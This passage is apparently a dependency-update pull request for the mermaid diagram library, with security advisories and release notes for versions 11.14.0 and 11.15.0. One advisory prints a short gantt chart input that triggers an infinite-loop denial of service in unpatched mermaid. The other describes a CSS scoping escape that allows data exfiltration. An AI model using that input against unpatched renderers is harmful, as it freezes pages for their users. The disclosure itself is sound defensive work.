`:not(&)` escapes the `#mermaid-xxx` automatic scoping, applying styles
to all page elements. Global at-rules (`@font-face`, `@keyframes`,
`@counter-style`) are also injectable as stylis hoists them to top
level.

This allows page defacement and DOM attribute exfiltration via CSS
`:has()` selectors.

##### Patches

- [v11.15.0](https://redirect.github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.15.0) (see [64769738d5b59211e1decb471ffbaca8afec51aa](https://redirect.github.com/mermaid-js/mermaid/commit/64769738d5b59211e1decb471ffbaca8afec51aa))
- [v10.9.6](https://redirect.github.com/mermaid-js/mermaid/releases/tag/v10.9.6) (see [a9d9f0d8eb790349121508688cd338253fd80d76](https://redirect.github.com/mermaid-js/mermaid/commit/a9d9f0d8eb790349121508688cd338253fd80d76))

##### Workarounds

If you can't upgrade mermaid, you can set the
[`secure`](https://mermaid.js.org/config/schema-docs/config.html#secure)
config value in the mermaid config to avoid allowing diagrams to modify
`fontFamily`, `themeCSS`, `altFontFamily`, and `themeVariables`.

Setting [`"securityLevel":
"sandbox"`](https://mermaid.js.org/config/schema-docs/config.html#securitylevel)
will also prevent this.

##### Credits

Reported by @zsxsoft on behalf of @KeenSecurityLab

#### Severity
- CVSS Score: 5.3 / 10 (Medium)
- Vector String:
`CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L`

#### References
-
[https://github.com/mermaid-js/mermaid/security/advisories/GHSA-87f9-hvmw-gh4p](https://redirect.github.com/mermaid-js/mermaid/security/advisories/GHSA-87f9-hvmw-gh4p)
-
[https://github.com/mermaid-js/mermaid/commit/64769738d5b59211e1decb471ffbaca8afec51aa](https://redirect.github.com/mermaid-js/mermaid/commit/64769738d5b59211e1decb471ffbaca8afec51aa)
-
[https://github.com/mermaid-js/mermaid/commit/a9d9f0d8eb790349121508688cd338253fd80d76](https://redirect.github.com/mermaid-js/mermaid/commit/a9d9f0d8eb790349121508688cd338253fd80d76)
-
[https://github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.15.0](https://redirect.github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.15.0)
-
[https://github.com/mermaid-js/mermaid/releases/tag/v10.9.6](https://redirect.github.com/mermaid-js/mermaid/releases/tag/v10.9.6)
-
[https://github.com/advisories/GHSA-87f9-hvmw-gh4p](https://redirect.github.com/advisories/GHSA-87f9-hvmw-gh4p)

This data is provided by the [GitHub Advisory
Database](https://redirect.github.com/advisories/GHSA-87f9-hvmw-gh4p)
([CC-BY
4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).
</details>

---

### Mermaid Gantt Charts are vulnerable to an Infinite Loop DoS
[CVE-2026-41150](https://nvd.nist.gov/vuln/detail/CVE-2026-41150) /
[GHSA-6m6c-36f7-fhxh](https://redirect.github.com/advisories/GHSA-6m6c-36f7-fhxh)

<details>
<summary>More information</summary>

#### Details
##### Impact

Mermaid v11.14.0 and earlier are vulnerable to a denial-of-service
attack when rendering gantt charts, if they use the [`excludes`
attribute](https://mermaid.js.org/syntax/gantt.html?#excludes) to
exclude all dates.

Example:

```
gantt
  excludes monday,tuesday,wednesday,thursday,friday,saturday,sunday
  DoS :2025-01-01, 1d
```

`mermaid.parse` is unaffected, unless you then call
`ganttDb.getTasks()` (which is called when rendering a diagram).

##### Patches

This has been patched in:

- [v11.15.0](https://redirect.github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.15.0) (see [faafb5d49106dd32c367f3882505f2dd625aa30e](https://redirect.github.com/mermaid-js/mermaid/commit/faafb5d49106dd32c367f3882505f2dd625aa30e))
- [v10.9.6](https://redirect.github.com/mermaid-js/mermaid/releases/tag/v10.9.6) (see [a59ea56174712ee5430dfd5bc877cb5151f501a6](https://redirect.github.com/mermaid-js/mermaid/commit/a59ea56174712ee5430dfd5bc877cb5151f501a6))

##### Workarounds

There are no workarounds available without updating to a newer version
of mermaid.

#### Severity
- CVSS Score: 5.3 / 10 (Medium)
- Vector String:
`CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:L/SC:N/SI:N/SA:L`

#### References
-
[https://github.com/mermaid-js/mermaid/security/advisories/GHSA-6m6c-36f7-fhxh](https://redirect.github.com/mermaid-js/mermaid/security/advisories/GHSA-6m6c-36f7-fhxh)
-
[https://github.com/mermaid-js/mermaid/commit/a59ea56174712ee5430dfd5bc877cb5151f501a6](https://redirect.github.com/mermaid-js/mermaid/commit/a59ea56174712ee5430dfd5bc877cb5151f501a6)
-
[https://github.com/mermaid-js/mermaid/commit/faafb5d49106dd32c367f3882505f2dd625aa30e](https://redirect.github.com/mermaid-js/mermaid/commit/faafb5d49106dd32c367f3882505f2dd625aa30e)
-
[https://github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.15.0](https://redirect.github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.15.0)
-
[https://github.com/mermaid-js/mermaid/releases/tag/v10.9.6](https://redirect.github.com/mermaid-js/mermaid/releases/tag/v10.9.6)
-
[https://github.com/advisories/GHSA-6m6c-36f7-fhxh](https://redirect.github.com/advisories/GHSA-6m6c-36f7-fhxh)

This data is provided by the [GitHub Advisory
Database](https://redirect.github.com/advisories/GHSA-6m6c-36f7-fhxh)
([CC-BY
4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).
</details>

---

### Release Notes

<details>
<summary>mermaid-js/mermaid (mermaid)</summary>

###
[`v11.15.0`](https://redirect.github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.15.0)

[Compare
Source](https://redirect.github.com/mermaid-js/mermaid/compare/mermaid@11.14.0...mermaid@11.15.0)

##### Minor Changes

-
[#&#8203;7174](https://redirect.github.com/mermaid-js/mermaid/pull/7174)
[`0aca217`](https://redirect.github.com/mermaid-js/mermaid/commit/0aca21739c0d1fcaaa206e04a6cd574ebc415483)
Thanks
[@&#8203;milesspencer35](https://redirect.github.com/milesspencer35)! -
feat(sequence): Add support for decimal start and increment values in
the `autonumber` directive

-
[#&#8203;7512](https://redirect.github.com/mermaid-js/mermaid/pull/7512)
[`8e17492`](https://redirect.github.com/mermaid-js/mermaid/commit/8e17492f7365ba50896382feb69a23efd9d8a22d)
Thanks [@&#8203;aruncveli](https://redirect.github.com/aruncveli)! -
feat(flowchart): add datastore shape

In Data flow diagrams, a datastore/warehouse/file/database is used to
represent data persistence. It is denoted by a rectangle with only top
and bottom borders, and can be used in flowcharts with `A@{ shape:
datastore, label: "Datastore" }`.

-
[#&#8203;6440](https://redirect.github.com/mermaid-js/mermaid/pull/6440)
[`9ad8dde`](https://redirect.github.com/mermaid-js/mermaid/commit/9ad8dde6d049adde85d8ed2d476c09b5820f3f4b)
Thanks [@&#8203;yordis](https://redirect.github.com/yordis),
[@&#8203;lgazo](https://redirect.github.com/lgazo)! - feat: add Event
Modeling diagram

-
[#&#8203;7707](https://redirect.github.com/mermaid-js/mermaid/pull/7707)
[`27db774`](https://redirect.github.com/mermaid-js/mermaid/commit/27db774627be1cee881961dfd0d2cb21cd01b79d)
Thanks [@&#8203;txmxthy](https://redirect.github.com/txmxthy)! -
feat(architecture): expose four fcose layout knobs for
`architecture-beta` diagrams (`nodeSeparation`,
`idealEdgeLengthMultiplier`, `edgeElasticity`, `numIter`) so authors can
tune layout density and spread overlapping siblings without changing
diagram source

-
[#&#8203;7604](https://redirect.github.com/mermaid-js/mermaid/pull/7604)
[`bf9502f`](https://redirect.github.com/mermaid-js/mermaid/commit/bf9502fb6012a4b724679b401ac928f5ee55161c)
Thanks [@&#8203;M-a-c](https://redirect.github.com/M-a-c)! -
feat(class): add nested namespace support for class diagrams via dot
notation and syntactic nesting

If you have namespaces in class diagrams that use `.`s already and want
to render them without nesting (≤v11.14.0 behaviour), you can set
`class.hierarchicalNamespaces=false` in your mermaid config:

  ```yaml
  config:
    class:
      hierarchicalNamespaces: false
  ```

-
[#&#8203;7272](https://redirect.github.com/mermaid-js/mermaid/pull/7272)
[`88cdd3d`](https://redirect.github.com/mermaid-js/mermaid/commit/88cdd3dc0aab9577174561b04e14760c565a232b)
Thanks [@&#8203;xinbenlv](https://redirect.github.com/xinbenlv)! -
feat(sankey): add outlined label style, configurable
nodeWidth/nodePadding, and custom node colors

##### Patch Changes

-
[#&#8203;7737](https://redirect.github.com/mermaid-js/mermaid/pull/7737)
[`e9b0f34`](https://redirect.github.com/mermaid-js/mermaid/commit/e9b0f34d8d82a6260077764ee45e1d7d90957a0f)
Thanks
[@&#8203;ashishjain0512](https://redirect.github.com/ashishjain0512)! -
fix: prevent unbalanced CSS styles in classDefs

-
[#&#8203;7737](https://redirect.github.com/mermaid-js/mermaid/pull/7737)
[`37ff937`](https://redirect.github.com/mermaid-js/mermaid/commit/37ff937f1da2e19f882fd1db01235db4d01f4056)
Thanks
[@&#8203;ashishjain0512](https://redirect.github.com/ashishjain0512)! -
fix: create CSS styles using the CSSOM

  This removes some invalid CSS and normalizes some CSS formatting.

-
[#&#8203;7508](https://redirect.github.com/mermaid-js/mermaid/pull/7508)
[`bfe60cc`](https://redirect.github.com/mermaid-js/mermaid/commit/bfe60cc67b9a6dec64f9161f58e4d24a06c42b65)
Thanks [@&#8203;biiab](https://redirect.github.com/biiab)! -
fix(stateDiagram): `end note` now only closes a note when used on a new
line

-
[#&#8203;7737](https://redirect.github.com/mermaid-js/mermaid/pull/7737)
[`faafb5d`](https://redirect.github.com/mermaid-js/mermaid/commit/faafb5d49106dd32c367f3882505f2dd625aa30e)
Thanks
[@&#8203;ashishjain0512](https://redirect.github.com/ashishjain0512)! -
fix(gantt): add iteration limit for `excludes` field

-
[#&#8203;7737](https://redirect.github.com/mermaid-js/mermaid/pull/7737)
[`65f8be2`](https://redirect.github.com/mermaid-js/mermaid/commit/65f8be2a42faf869b811469571983cba7eeeca99)
Thanks
[@&#8203;ashishjain0512](https://redirect.github.com/ashishjain0512)! -
fix: disallow some CSS at-rules in custom CSS

-
[#&#8203;7726](https://redirect.github.com/mermaid-js/mermaid/pull/7726)
[`1502f32`](https://redirect.github.com/mermaid-js/mermaid/commit/1502f32f3c5fb944925b0c527fbbde3c4f041824)
Thanks [@&#8203;aloisklink](https://redirect.github.com/aloisklink)! -
fix(wardley): fix unnecessary sanitization of text

-
[#&#8203;7578](https://redirect.github.com/mermaid-js/mermaid/pull/7578)
[`1f98db8`](https://redirect.github.com/mermaid-js/mermaid/commit/1f98db8e326299ac97a2fa60abfd509d8f5f16e2)
Thanks [@&#8203;Gaston202](https://redirect.github.com/Gaston202)! -
fix(class): self-referential class multiplicity labels no longer
rendered multiple times

Fixes
[#&#8203;7560](https://redirect.github.com/mermaid-js/mermaid/issues/7560).
Resolves an issue where cardinality labels on self-referential class
relationships were rendered three times due to edge splitting in the
dagre layout. The fix ensures that each sub-edge only carries its
relevant label positions.

-
[#&#8203;7592](https://redirect.github.com/mermaid-js/mermaid/pull/7592)
[`2343e38`](https://redirect.github.com/mermaid-js/mermaid/commit/2343e38498a3b31f8ce5e79f1f009e0b56fbe086)
Thanks [@&#8203;knsv-bot](https://redirect.github.com/knsv-bot)! -
fix(sequence): add background box behind alt/else section title labels
in sequence diagrams

-
[#&#8203;7589](https://redirect.github.com/mermaid-js/mermaid/pull/7589)
[`7fb9509`](https://redirect.github.com/mermaid-js/mermaid/commit/7fb9509b8b5cb1dc48519dc60cf6cdc6afba0462)
Thanks [@&#8203;NYCU-Chung](https://redirect.github.com/NYCU-Chung)! -
fix(block): prevent column widths from shrinking when mixing different
column spans

-
[#&#8203;7632](https://redirect.github.com/mermaid-js/mermaid/pull/7632)
[`3f9e0f1`](https://redirect.github.com/mermaid-js/mermaid/commit/3f9e0f15bedc1e2c71ddb6b34192d1a21124cfc2)
Thanks [@&#8203;ekiauhce](https://redirect.github.com/ekiauhce)! -
fix(sequence): correct messageAlign label position for right-to-left
arrows in sequence diagrams

-
[#&#8203;7642](https://redirect.github.com/mermaid-js/mermaid/pull/7642)
[`7a8fb85`](https://redirect.github.com/mermaid-js/mermaid/commit/7a8fb8532c57ecc55b3711454ab0e505a4291445)
Thanks [@&#8203;tractorjuice](https://redirect.github.com/tractorjuice)!
- fix(wardley): allow hyphens in unquoted component names

Multi-word names containing hyphens — e.g. `real-time processing`,
`end-user`, `on-call engineer` — now parse without quoting, bringing the
grammar in line with the OnlineWardleyMaps (OWM) convention. `A->B`
(no-space arrow) still tokenises correctly.

-
[#&#8203;7523](https://redirect.github.com/mermaid-js/mermaid/pull/7523)
[`5144ed4`](https://redirect.github.com/mermaid-js/mermaid/commit/5144ed4b138ae0f4836bab4c163c575e0a767dd3)
Thanks [@&#8203;darshanr0107](https://redirect.github.com/darshanr0107)!
- fix(block): Arrow blocks in block-beta diagrams not spanning the
specified number of columns when using `:n` syntax.

-
[#&#8203;7262](https://redirect.github.com/mermaid-js/mermaid/pull/7262)
[`13d9bfa`](https://redirect.github.com/mermaid-js/mermaid/commit/13d9bfa4748e845a9eec7d6265ba496d2278f26e)
Thanks [@&#8203;darshanr0107](https://redirect.github.com/darshanr0107)!
- fix(block): Ensure block diagram hexagon blocks respect column
spanning syntax

-
[#&#8203;7684](https://redirect.github.com/mermaid-js/mermaid/pull/7684)
[`e14bb88`](https://redirect.github.com/mermaid-js/mermaid/commit/e14bb88bdb940124cdb0a107025653bf93745c99)
Thanks [@&#8203;aloisklink](https://redirect.github.com/aloisklink)! -
fix: loosen `uuid` dependency range to allow v14

  Mermaid does not use any of the vulnerable code in CVE-2026-41907,
  but this allows users to silence any `npm audit` alerts on it.

-
[#&#8203;7633](https://redirect.github.com/mermaid-js/mermaid/pull/7633)
[`9217c0d`](https://redirect.github.com/mermaid-js/mermaid/commit/9217c0d8b221b423af80e420b7adae901acf6c8c)
Thanks [@&#8203;Felix-Garci](https://redirect.github.com/Felix-Garci)! -
fix(block): add support for all arrow types in block diagrams

-
[#&#8203;7587](https://redirect.github.com/mermaid-js/mermaid/pull/7587)
[`5e7eb62`](https://redirect.github.com/mermaid-js/mermaid/commit/5e7eb62e3aba6b5df559f5c839a868e5b7f40e72)
Thanks
[@&#8203;MaddyGuthridge](https://redirect.github.com/MaddyGuthridge)! -
chore: drop lodash-es in favour of es-toolkit

-
[#&#8203;7693](https://redirect.github.com/mermaid-js/mermaid/pull/7693)
[`afaf306`](https://redirect.github.com/mermaid-js/mermaid/commit/afaf3062381d115d66744413151b642f124dd9ba)
Thanks [@&#8203;dull-bird](https://redirect.github.com/dull-bird)! -
fix(quadrant-chart): allow CJK, emoji, Latin-1 accented characters, and
other non-ASCII text in unquoted axis/quadrant/point labels.

Previously the lexer only matched ASCII `[A-Za-z]+` for text tokens,
even though the grammar referenced `UNICODE_TEXT`. Bare Chinese,
Japanese, Korean, emoji, and accented Latin characters in labels caused
a parse error. Added a `[^\x00-\x7F]+` lexer rule to emit `UNICODE_TEXT`
and included it in the `alphaNumToken` grammar rule.

Fixes
[#&#8203;7120](https://redirect.github.com/mermaid-js/mermaid/issues/7120).

-
[#&#8203;7737](https://redirect.github.com/mermaid-js/mermaid/pull/7737)
[`4755553`](https://redirect.github.com/mermaid-js/mermaid/commit/4755553d5fb6d1217809e43ffb8fc54d6a73e482)
Thanks
[@&#8203;ashishjain0512](https://redirect.github.com/ashishjain0512)! -
fix: improve D3 types for mermaidAPI funcs

-
[#&#8203;7737](https://redirect.github.com/mermaid-js/mermaid/pull/7737)
[`6476973`](https://redirect.github.com/mermaid-js/mermaid/commit/64769738d5b59211e1decb471ffbaca8afec51aa)
Thanks
[@&#8203;ashishjain0512](https://redirect.github.com/ashishjain0512)! -
fix: handle `&` when namespacing CSS rules

-
[#&#8203;7520](https://redirect.github.com/mermaid-js/mermaid/pull/7520)
[`8c1a0c1`](https://redirect.github.com/mermaid-js/mermaid/commit/8c1a0c1fd19587c6772d6966fe9d217e5cd1356c)
Thanks
[@&#8203;RodrigojndSantos](https://redirect.github.com/RodrigojndSantos)!
- fix(stateDiagram): comments starting with one `%` are no longer
treated as comments

  Switch to using two `%%` if you want to write a comment.

- Updated dependencies
\[[`7a8fb85`](https://redirect.github.com/mermaid-js/mermaid/commit/7a8fb8532c57ecc55b3711454ab0e505a4291445),
[`675a64c`](https://redirect.github.com/mermaid-js/mermaid/commit/675a64ca0e3cde8728ca715991623c3fc055ce88)]:
-
[@&#8203;mermaid-js/parser](https://redirect.github.com/mermaid-js/parser)@&#8203;1.1.1

###
[`v11.14.0`](https://redirect.github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.14.0)

[Compare
Source](https://redirect.github.com/mermaid-js/mermaid/compare/mermaid@11.13.0...mermaid@11.14.0)

Thanks to our awesome mermaid community that contributed to this
release:
[@&#8203;ashishjain0512](https://redirect.github.com/ashishjain0512),
[@&#8203;tractorjuice](https://redirect.github.com/tractorjuice),
[@&#8203;autofix-ci\[bot\]](https://redirect.github.com/autofix-ci%5Bbot%5D),
[@&#8203;aloisklink](https://redirect.github.com/aloisklink),
[@&#8203;knsv](https://redirect.github.com/knsv),
[@&#8203;kibanana](https://redirect.github.com/kibanana),
[@&#8203;chandershekhar22](https://redirect.github.com/chandershekhar22),
[@&#8203;khalil](https://redirect.github.com/khalil),
[@&#8203;ytatsuno](https://redirect.github.com/ytatsuno),
[@&#8203;sidharthv96](https://redirect.github.com/sidharthv96),
[@&#8203;github-actions\[bot\]](https://redirect.github.com/github-actions%5Bbot%5D),
[@&#8203;dripcoding](https://redirect.github.com/dripcoding),
[@&#8203;knsv-bot](https://redirect.github.com/knsv-bot),
[@&#8203;jeroensmink98](https://redirect.github.com/jeroensmink98),
[@&#8203;Alex9583](https://redirect.github.com/Alex9583),
[@&#8203;GhassenS](https://redirect.github.com/GhassenS),
[@&#8203;omkarht](https://redirect.github.com/omkarht),
[@&#8203;darshanr0107](https://redirect.github.com/darshanr0107),
[@&#8203;leentaylor](https://redirect.github.com/leentaylor),
[@&#8203;lee-treehouse](https://redirect.github.com/lee-treehouse),
[@&#8203;veeceey](https://redirect.github.com/veeceey),
[@&#8203;turntrout](https://redirect.github.com/turntrout),
[@&#8203;Mermaid-Chart](https://redirect.github.com/Mermaid-Chart),
[@&#8203;BambioGaming](https://redirect.github.com/BambioGaming), Claude

### Releases

####
[@&#8203;mermaid-js/examples](https://redirect.github.com/mermaid-js/examples)@&#8203;1.2.0

##### Minor Changes

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- add new TreeView diagram

#### mermaid\@&#8203;11.14.0

##### Minor Changes

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- Add Wardley Maps diagram type (beta)

Adds Wardley Maps as a new diagram type to Mermaid (available as
`wardley-beta`). Wardley Maps are visual representations of business
strategy that help map value chains and component evolution.

  Features:

- Component positioning with \[visibility, evolution] coordinates (OWM
format)
  - Anchors for users/customers
  - Multiple link types: dependencies, flows, labeled links
  - Evolution arrows and trend indicators
  - Custom evolution stages with optional dual labels
- Custom stage widths using
[@&#8203;boundary](https://redirect.github.com/boundary) notation
  - Pipeline components with visibility inheritance
  - Annotations, notes, and visual elements
  - Source strategy markers: build, buy, outsource, market
  - Inertia indicators
  - Theme integration

Implementation includes parser, D3.js renderer, unit tests, E2E tests,
and comprehensive documentation.

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- feat: implement neo look styling for state diagrams

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- feat: implement neo look support for sequence diagrams with drop
shadows, and enhanced styling

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- feat: add `randomize` config option for architecture diagrams,
defaulting to `false` for deterministic layout

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- feat: Add option to change timeline direction

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- Fix duplicate SVG element IDs when rendering multiple diagrams on the
same page. Internal element IDs (nodes, edges, markers, clusters) are
now prefixed with the diagram's SVG element ID across all diagram types.
Custom CSS or JS using exact ID selectors like `#arrowhead` should use
attribute-ending selectors like `[id$="-arrowhead"]` instead.

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- feat: implement neo look styling for ER diagrams

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- feat: implement neo look styling for requirement diagrams

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- feat: add theme support for data label colour in xy chart

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- feat: implement neo look styling for mindmap diagrams

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- feat: implement neo look for mermaid flowchart diagrams

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- feat: implement neo look and themes for class diagram

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- feat: add showDataLabelOutsideBar option for xy chart

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- feat: implement neo look support for timeline diagram with drop
shadows, additional redux themes and enhanced styling

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- feat: implement neo look and themes for gitGraph diagram

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- add new TreeView diagram

##### Patch Changes

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- add link to ishikawa diagram on mermaid.js.org

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- docs: document valid duration token formats in gantt.md

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- fix: ER diagram parsing when using "1" as entity identifier on right
side

The parser was incorrectly tokenizing the second "1" in patterns like `a
many to 1 1:` because the lookahead rule only checked for alphabetic
characters after whitespace, not digits. Added a new lookahead pattern
`"1"(?=\s+[0-9])` to correctly identify the cardinality alias before a
numeric entity name.

Fixes
[#&#8203;7472](https://redirect.github.com/mermaid-js/mermaid/issues/7472)

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- fix: scope cytoscape label style mapping to edges with labels to
prevent console warnings

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- fix: support inline annotation syntax in class diagrams (class Shape
<<interface>>)

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- fix: Align branch label background with text for multi-line labels in
LR GitGraph layout

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- fix: preserve cause hierarchy when ishikawa effect is indented more
than causes

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- refactor: remove unused createGraphWithElements function and add
regression test for open edge arrowheads

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- fix: Prevent long pie chart titles from being clipped by expanding the
viewBox

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- fix: prevent sequence diagram hang when "as" is used without a
trailing space in participant declarations

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- fix: warn when `style` statement targets a non-existent node in
flowcharts

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- fix: group state diagram SVG children under single root <g> element

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- fix: Allow :::className syntax inside composite state blocks

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
Thanks [@&#8203;aloisklink](https://redirect.github.com/aloisklink),
[@&#8203;BambioGaming](https://redirect.github.com/BambioGaming)! - fix:
prevent escaping `<` and `&` when `htmlLabels: false`

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- fix: treemap title and labels use theme-aware colors for dark
backgrounds

- Updated dependencies
\[[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)]:
-
[@&#8203;mermaid-js/parser](https://redirect.github.com/mermaid-js/parser)@&#8203;1.1.0

####
[@&#8203;mermaid-js/parser](https://redirect.github.com/mermaid-js/parser)@&#8203;1.1.0

##### Minor Changes

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- add new TreeView diagram

####
[@&#8203;mermaid-js/tiny](https://redirect.github.com/mermaid-js/tiny)@&#8203;11.14.0

##### Minor Changes

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- Add Wardley Maps diagram type (beta)

Adds Wardley Maps as a new diagram type to Mermaid (available as
`wardley-beta`). Wardley Maps are visual representations of business
strategy that help map value chains and component evolution.

  Features:

- Component positioning with \[visibility, evolution] coordinates (OWM
format)
  - Anchors for users/customers
  - Multiple link types: dependencies, flows, labeled links
  - Evolution arrows and trend indicators
  - Custom evolution stages with optional dual labels
- Custom stage widths using
[@&#8203;boundary](https://redirect.github.com/boundary) notation
  - Pipeline components with visibility inheritance
  - Annotations, notes, and visual elements
  - Source strategy markers: build, buy, outsource, market
  - Inertia indicators
  - Theme integration

Implementation includes parser, D3.js renderer, unit tests, E2E tests,
and comprehensive documentation.

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- feat: implement neo look styling for state diagrams

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
